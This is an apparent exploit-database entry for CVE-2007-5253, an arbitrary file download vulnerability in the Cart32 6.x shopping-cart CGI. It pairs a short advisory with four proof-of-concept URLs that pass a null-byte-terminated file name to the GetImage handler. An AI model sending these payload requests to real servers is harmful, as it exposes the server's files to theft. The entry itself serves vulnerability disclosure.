Cart32 6.x - GetImage Arbitrary File Download

Author: Paul Craig
type: webapps
platform: cgi
port: 
date_added: 2007-10-04  
date_updated: 2014-01-02  
verified: 1  
codes: CVE-2007-5253;OSVDB-38580  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30639.txt  
source: https://www.securityfocus.com/bid/25928/info

Cart32 is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.

This issue affects Cart32 6.3; prior versions are also vulnerable.

http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jpg
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pdf
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png